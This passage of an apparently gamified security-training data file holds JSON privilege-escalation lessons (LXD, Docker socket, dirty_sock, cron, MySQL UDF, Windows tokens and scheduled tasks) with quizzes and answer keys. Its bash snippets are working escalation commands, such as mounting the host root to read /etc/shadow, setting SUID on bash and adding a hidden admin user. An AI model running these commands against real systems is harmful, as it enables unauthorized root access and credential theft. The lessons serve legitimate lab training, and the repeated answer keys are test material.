always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-lxd-group","cat":"Privilege Escalation","title":"LXD Group Privilege Escalation","diff":2,"xp":150,"intro":"Being in the lxd group gives you root access.","sections":[{"type":"text","content":"Create a privileged LXD container with the host filesystem mounted. Access any file on the host as root from inside the container."},{"type":"code","lang":"bash","content":"# Check groups\nid\n# If in lxd group:\nlxc image import alpine.tar.gz --alias myimg\nlxc init myimg privesc -c security.privileged=true\nlxc config device add privesc host-root disk source=/ path=/mnt/root\nlxc start privesc\nlxc exec privesc /bin/sh\n# Now: cat /mnt/root/etc/shadow"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"LXD group gives root because...","opts":["LXD is setuid","LXD can create privileged containers mounting the host filesystem","LXD modifies sudoers","LXD changes permissions"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-snap-privesc","cat":"Privilege Escalation","title":"Snap Package Exploitation","diff":3,"xp":200,"intro":"Exploit dirty_sock or misconfigured snaps for privilege escalation.","sections":[{"type":"text","content":"Snap's socket (snapd) and package installation can be exploited. dirty_sock (CVE-2019-7304) creates a local user with sudo access via the snapd API."},{"type":"code","lang":"bash","content":"# Check snap version\nsnap version\n# dirty_sock exploit\npython3 dirty_sock.py\n# Check for writable snap directories\nfind /snap -writable 2>/dev/null"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"dirty_sock exploits...","opts":["The snap store","A vulnerability in snapd's local API authentication","Package signing","Network protocol"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-docker-socket2","cat":"Privilege Escalation","title":"Docker Socket Exploitation","diff":2,"xp":150,"intro":"Mount the Docker socket in a container for host root access.","sections":[{"type":"text","content":"If /var/run/docker.sock is accessible, create a container mounting the host root filesystem."},{"type":"code","lang":"bash","content":"# Check if docker socket is accessible\nls -la /var/run/docker.sock\n# Escape to host\ndocker run -v /:/mnt --rm -it alpine chroot /mnt bash\n# Or via API\ncurl --unix-socket /var/run/docker.sock http://docker/containers/json"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Docker socket access equals root because...","opts":["Docker encrypts everything","Docker daemon runs as root and can mount any host path","Docker uses VMs","Docker modifies the kernel"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-crontab-abuse","cat":"Privilege Escalation","title":"Crontab Exploitation Techniques","diff":2,"xp":150,"intro":"Exploit writable cron scripts, PATH hijacking, and wildcard injection.","sections":[{"type":"text","content":"Multiple cron attack vectors: writable scripts, cron PATH hijacking, tar wildcard injection, and cron log enumeration."},{"type":"code","lang":"bash","content":"# View all cron sources\ncat /etc/crontab\nls -la /etc/cron.d/ /etc/cron.daily/ /etc/cron.hourly/\ncrontab -l  # current user\nsudo crontab -l  # root cron\n# Find writable cron scripts\nfor f in $(grep -rh '/' /etc/crontab /etc/cron.d/ 2>/dev/null | awk '{print $NF}'); do ls -la $f 2>/dev/null; done"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Why check multiple cron locations?","opts":["Cron is slow","Different cron files run at different intervals and as different users","Only /etc/crontab matters","Cron is encrypted"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-mysql-root","cat":"Privilege Escalation","title":"MySQL as Root","diff":3,"xp":200,"intro":"Exploit MySQL running as root for OS command execution.","sections":[{"type":"text","content":"If MySQL runs as root and you have MySQL root access, use User Defined Functions (UDF) to execute OS commands."},{"type":"code","lang":"bash","content":"# Check if MySQL runs as root\nps aux | grep mysql\n# Connect\nmysql -u root -p\n# UDF exploitation\nmysql> CREATE FUNCTION sys_exec RETURNS integer SONAME 'lib_mysqludf_sys.so';\nmysql> SELECT sys_exec('chmod +s /bin/bash');"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"MySQL UDF escalation requires...","opts":["Web access","MySQL root access AND MySQL running as OS root","Network access","Physical access"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-win-token-priv","cat":"Privilege Escalation","title":"Windows Token Privilege Abuse","diff":3,"xp":200,"intro":"Exploit dangerous privileges for escalation.","sections":[{"type":"text","content":"Key privileges: SeImpersonate (Potato attacks), SeBackup (read any file), SeRestore (write any file), SeDebug (inject into processes), SeLoadDriver (load kernel drivers)."},{"type":"code","lang":"bash","content":"whoami /priv\n# SeImpersonatePrivilege -> PrintSpoofer, GodPotato\n# SeBackupPrivilege -> Copy SAM/SYSTEM hives\n# SeDebugPrivilege -> Inject into SYSTEM process\n# SeLoadDriverPrivilege -> Load vulnerable driver"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"SeBackupPrivilege allows...","opts":["Code execution","Reading any file on the system regardless of ACLs","Network scanning","User creation"],"ans":1},{"type":"quiz","q":"PATH hijacking works when a script uses...","opts":["Absolute paths","Relative command names without full paths","Environment variables","File descriptors"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-win-scheduled-task","cat":"Privilege Escalation","title":"Windows Scheduled Task Exploitation","diff":2,"xp":150,"intro":"Exploit writable scheduled task scripts for escalation.","sections":[{"type":"text","content":"If a scheduled task runs a script you can modify, inject commands. schtasks reveals all tasks including hidden ones."},{"type":"code","lang":"bash","content":"schtasks /query /fo LIST /v\n# Check permissions on task binaries\nicacls 'C:Scripts\\backup.ps1'\n# If writable:\nAdd-Content 'C:Scripts\\backup.ps1' 'Start-Process cmd -ArgumentList \"/c net user hacker P@ss /add\"'"},{"type":"text","content":"Privesc is about finding gaps between what you can do and what the system allows. Methodology matters more than specific exploits: enumerate systematically, understand findings, then choose the technique."},{"type":"tip","content":"Run LinPEAS/WinPEAS but don't blindly follow highlights. Read the full output. A SUID binary isn't automatically exploitable."},{"type":"task","content":"Get initial access on a vulnerable VM. Enumerate manually for 30 minutes before running any automated script. Compare your notes with LinPEAS output."},{"type":"quiz","q":"Writable scheduled task scripts give you...","opts":["Read access","Code execution at the task's privilege level","Log viewing","Network access"],"ans":1},{"type":"quiz","q":"SUID bit means the binary runs as...","opts":["The current user","The file owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"What file contains Linux user password hashes?","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"Windows stores local hashes in...","opts":["NTDS.dit","SAM database","Registry","Event logs"],"ans":1},{"type":"quiz","q":"Which command checks sudo permissions?","opts":["sudo -s","sudo -l","sudo -v","sudo -u"],"ans":1},{"type":"quiz","q":"Kernel exploits are risky because...","opts":["They're slow","They can crash the entire system","They require network access","They need GUI"],"ans":1},{"type":"quiz","q":"What is a capability in Linux?","opts":["A user group","A fine-grained root privilege","A file permission","A process state"],"ans":1},{"type":"quiz","q":"WinPEAS and LinPEAS are...","opts":["Exploit frameworks","Privilege escalation enumeration scripts","Password crackers","Network scanners"],"ans":1},{"type":"quiz","q":"An unquoted service path is exploitable when...","opts":["The path is short","The path has spaces and no quotes","The service is disabled","The binary is encrypted"],"ans":1},{"type":"quiz","q":"Docker group membership gives root because...","opts":["Docker is setuid","Docker daemon runs as root and can mount host paths","Docker encrypts everything","Docker modifies /etc/passwd"],"ans":1},{"type":"quiz","q":"What does 'find / -writable' find?","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"SeImpersonatePrivilege on Windows allows...","opts":["File deletion","Token impersonation attacks (Potato)","Registry editing","Network scanning"],"ans":1},{"type":"quiz","q":"cron jobs run as which user?","opts":["Always root","The user who owns the crontab","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What tool checks for Windows privesc vectors?","opts":["nmap","WinPEAS / PowerUp","Wireshark","Burp Suite"],"ans":1},{"type":"quiz","q":"NFS no_root_squash allows...","opts":["Anonymous access","Remote root to create files as root","Encryption","Compression"],"ans":1},{"type":"quiz","q":"SUID runs as...","opts":["Current user","File owner","Root always","Nobody"],"ans":1},{"type":"quiz","q":"Password hashes are in...","opts":["/etc/passwd","/etc/shadow","/etc/hosts","/etc/sudoers"],"ans":1},{"type":"quiz","q":"sudo -l shows...","opts":["All users","Your sudo permissions","Sudo log","Sudo version"],"ans":1},{"type":"quiz","q":"Kernel exploits risk...","opts":["Slowness","System crash","Network issues","GUI problems"],"ans":1},{"type":"quiz","q":"LinPEAS/WinPEAS are...","opts":["Exploit frameworks","Privesc enumeration scripts","Password crackers","Scanners"],"ans":1},{"type":"quiz","q":"Docker group equals root because...","opts":["SUID","Daemon runs as root with host mount","Encryption","Modifies passwd"],"ans":1},{"type":"quiz","q":"find / -writable finds...","opts":["All files","Files you can modify","Hidden files","Encrypted files"],"ans":1},{"type":"quiz","q":"Cron jobs run as...","opts":["Always root","Crontab owner","Nobody","www-data"],"ans":1},{"type":"quiz","q":"What is a capability?","opts":["User group","Fine-grained root privilege","File permission","Process state"],"ans":1},{"type":"quiz","q":"GTFOBins lists...","opts":["Malware","Exploitable Unix binaries","Passwords","CVEs"],"ans":1}]},{"id":"pe-win-autorun","cat":"Privilege Escalation","title":"Windows Autorun Registry Keys","diff":1,"xp":100,"intro":"Find and exploit autorun entries for escalation and persistence.","sections":[{"type":"text","content":"Autorun registry keys (Run, RunOnce) execute programs at login. If referenced binaries are writable, replace them with your payload."},{"type":"code","lang":"bash","content":"reg query 